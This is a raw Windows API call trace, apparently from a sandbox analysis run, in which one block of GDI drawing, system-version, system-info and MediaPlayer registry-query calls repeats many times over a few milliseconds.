[0087.632] CreateSolidBrush (color=0xff0000) returned 0x11008d5 [0087.632] DeleteObject (ho=0x11008d5) returned 1 [0087.632] DeleteObject (ho=0x500401d0) returned 1 [0087.632] DeleteObject (ho=0x520401cd) returned 1 [0087.632] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.632] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.632] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.632] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.633] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.633] BeginPath (hdc=0x0) returned 0 [0087.633] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.633] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.633] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.633] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.633] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.633] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.633] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.633] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.633] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x510401d0 [0087.633] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x530401cd [0087.633] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408d6 [0087.633] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408d7 [0087.633] CombineRgn (hrgnDst=0x10408d6, hrgnSrc1=0x510401d0, hrgnSrc2=0x530401cd, iMode=1) returned 1 [0087.633] CombineRgn (hrgnDst=0x10408d7, hrgnSrc1=0x510401d0, hrgnSrc2=0x530401cd, iMode=4) returned 2 [0087.633] CreateSolidBrush (color=0xff) returned 0x21008d5 [0087.633] CreateSolidBrush (color=0xff0000) returned 0x11008d8 [0087.633] DeleteObject (ho=0x11008d8) returned 1 [0087.633] DeleteObject (ho=0x530401cd) returned 1 [0087.633] DeleteObject (ho=0x510401d0) returned 1 [0087.633] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.633] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.633] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.633] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.633] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.633] BeginPath (hdc=0x0) returned 0 [0087.633] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.633] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.633] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.633] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.633] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.633] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.633] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.633] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.633] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x540401cd [0087.633] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x520401d0 [0087.633] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408d9 [0087.634] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408da [0087.634] CombineRgn (hrgnDst=0x10408d9, hrgnSrc1=0x540401cd, hrgnSrc2=0x520401d0, iMode=1) returned 1 [0087.634] CombineRgn (hrgnDst=0x10408da, hrgnSrc1=0x540401cd, hrgnSrc2=0x520401d0, iMode=4) returned 2 [0087.634] CreateSolidBrush (color=0xff) returned 0x21008d8 [0087.634] CreateSolidBrush (color=0xff0000) returned 0x11008db [0087.634] DeleteObject (ho=0x11008db) returned 1 [0087.634] DeleteObject (ho=0x520401d0) returned 1 [0087.634] DeleteObject (ho=0x540401cd) returned 1 [0087.634] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.634] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.634] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.634] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.634] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.634] BeginPath (hdc=0x0) returned 0 [0087.634] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.634] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.634] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.634] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.634] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.634] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.634] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.634] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.634] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x530401d0 [0087.634] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x550401cd [0087.634] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408dc [0087.634] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408dd [0087.634] CombineRgn (hrgnDst=0x10408dc, hrgnSrc1=0x530401d0, hrgnSrc2=0x550401cd, iMode=1) returned 1 [0087.634] CombineRgn (hrgnDst=0x10408dd, hrgnSrc1=0x530401d0, hrgnSrc2=0x550401cd, iMode=4) returned 2 [0087.634] CreateSolidBrush (color=0xff) returned 0x21008db [0087.634] CreateSolidBrush (color=0xff0000) returned 0x11008de [0087.634] DeleteObject (ho=0x11008de) returned 1 [0087.634] DeleteObject (ho=0x550401cd) returned 1 [0087.634] DeleteObject (ho=0x530401d0) returned 1 [0087.634] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.634] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.634] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.634] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.634] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.634] BeginPath (hdc=0x0) returned 0 [0087.634] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.634] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.634] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.634] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.634] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.635] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.635] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.635] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.635] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x560401cd [0087.635] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x540401d0 [0087.635] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408df [0087.635] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408e0 [0087.635] CombineRgn (hrgnDst=0x10408df, hrgnSrc1=0x560401cd, hrgnSrc2=0x540401d0, iMode=1) returned 1 [0087.635] CombineRgn (hrgnDst=0x10408e0, hrgnSrc1=0x560401cd, hrgnSrc2=0x540401d0, iMode=4) returned 2 [0087.635] CreateSolidBrush (color=0xff) returned 0x21008de [0087.635] CreateSolidBrush (color=0xff0000) returned 0x11008e1 [0087.635] DeleteObject (ho=0x11008e1) returned 1 [0087.635] DeleteObject (ho=0x540401d0) returned 1 [0087.635] DeleteObject (ho=0x560401cd) returned 1 [0087.635] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.635] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.635] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.635] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.635] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.635] BeginPath (hdc=0x0) returned 0 [0087.635] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.635] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.635] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.635] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.635] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.635] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.635] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.635] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.635] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x550401d0 [0087.635] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x570401cd [0087.635] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408e2 [0087.635] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408e3 [0087.635] CombineRgn (hrgnDst=0x10408e2, hrgnSrc1=0x550401d0, hrgnSrc2=0x570401cd, iMode=1) returned 1 [0087.635] CombineRgn (hrgnDst=0x10408e3, hrgnSrc1=0x550401d0, hrgnSrc2=0x570401cd, iMode=4) returned 2 [0087.635] CreateSolidBrush (color=0xff) returned 0x21008e1 [0087.635] CreateSolidBrush (color=0xff0000) returned 0x11008e4 [0087.635] DeleteObject (ho=0x11008e4) returned 1 [0087.635] DeleteObject (ho=0x570401cd) returned 1 [0087.636] DeleteObject (ho=0x550401d0) returned 1 [0087.636] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.636] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.636] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.636] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.636] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.636] BeginPath (hdc=0x0) returned 0 [0087.636] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.636] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.636] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.636] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.636] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.636] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.636] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.636] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.636] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x580401cd [0087.636] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x560401d0 [0087.636] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408e5 [0087.636] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408e6 [0087.636] CombineRgn (hrgnDst=0x10408e5, hrgnSrc1=0x580401cd, hrgnSrc2=0x560401d0, iMode=1) returned 1 [0087.636] CombineRgn (hrgnDst=0x10408e6, hrgnSrc1=0x580401cd, hrgnSrc2=0x560401d0, iMode=4) returned 2 [0087.636] CreateSolidBrush (color=0xff) returned 0x21008e4 [0087.636] CreateSolidBrush (color=0xff0000) returned 0x11008e7 [0087.636] DeleteObject (ho=0x11008e7) returned 1 [0087.636] DeleteObject (ho=0x560401d0) returned 1 [0087.636] DeleteObject (ho=0x580401cd) returned 1 [0087.636] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.636] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.636] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.636] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.636] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.636] BeginPath (hdc=0x0) returned 0 [0087.636] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.636] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.636] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.636] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.636] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.636] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.636] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.636] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.637] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x570401d0 [0087.637] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x590401cd [0087.637] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408e8 [0087.637] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408e9 [0087.637] CombineRgn (hrgnDst=0x10408e8, hrgnSrc1=0x570401d0, hrgnSrc2=0x590401cd, iMode=1) returned 1 [0087.637] CombineRgn (hrgnDst=0x10408e9, hrgnSrc1=0x570401d0, hrgnSrc2=0x590401cd, iMode=4) returned 2 [0087.637] CreateSolidBrush (color=0xff) returned 0x21008e7 [0087.637] CreateSolidBrush (color=0xff0000) returned 0x11008ea [0087.637] DeleteObject (ho=0x11008ea) returned 1 [0087.637] DeleteObject (ho=0x590401cd) returned 1 [0087.637] DeleteObject (ho=0x570401d0) returned 1 [0087.637] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.637] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.637] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.637] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.637] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.637] BeginPath (hdc=0x0) returned 0 [0087.637] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.637] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.637] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.637] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.637] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.637] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.637] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.637] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.637] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5a0401cd [0087.637] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x580401d0 [0087.637] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408eb [0087.637] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408ec [0087.637] CombineRgn (hrgnDst=0x10408eb, hrgnSrc1=0x5a0401cd, hrgnSrc2=0x580401d0, iMode=1) returned 1 [0087.637] CombineRgn (hrgnDst=0x10408ec, hrgnSrc1=0x5a0401cd, hrgnSrc2=0x580401d0, iMode=4) returned 2 [0087.637] CreateSolidBrush (color=0xff) returned 0x21008ea [0087.637] CreateSolidBrush (color=0xff0000) returned 0x11008ed [0087.637] DeleteObject (ho=0x11008ed) returned 1 [0087.637] DeleteObject (ho=0x580401d0) returned 1 [0087.637] DeleteObject (ho=0x5a0401cd) returned 1 [0087.637] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.638] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.638] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.638] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.638] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.638] BeginPath (hdc=0x0) returned 0 [0087.638] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.638] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.638] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.638] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.638] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.638] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.638] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.638] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.638] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x590401d0 [0087.638] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5b0401cd [0087.638] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408ee [0087.638] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408ef [0087.638] CombineRgn (hrgnDst=0x10408ee, hrgnSrc1=0x590401d0, hrgnSrc2=0x5b0401cd, iMode=1) returned 1 [0087.638] CombineRgn (hrgnDst=0x10408ef, hrgnSrc1=0x590401d0, hrgnSrc2=0x5b0401cd, iMode=4) returned 2 [0087.638] CreateSolidBrush (color=0xff) returned 0x21008ed [0087.638] CreateSolidBrush (color=0xff0000) returned 0x11008f0 [0087.638] DeleteObject (ho=0x11008f0) returned 1 [0087.638] DeleteObject (ho=0x5b0401cd) returned 1 [0087.638] DeleteObject (ho=0x590401d0) returned 1 [0087.638] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.638] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.638] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 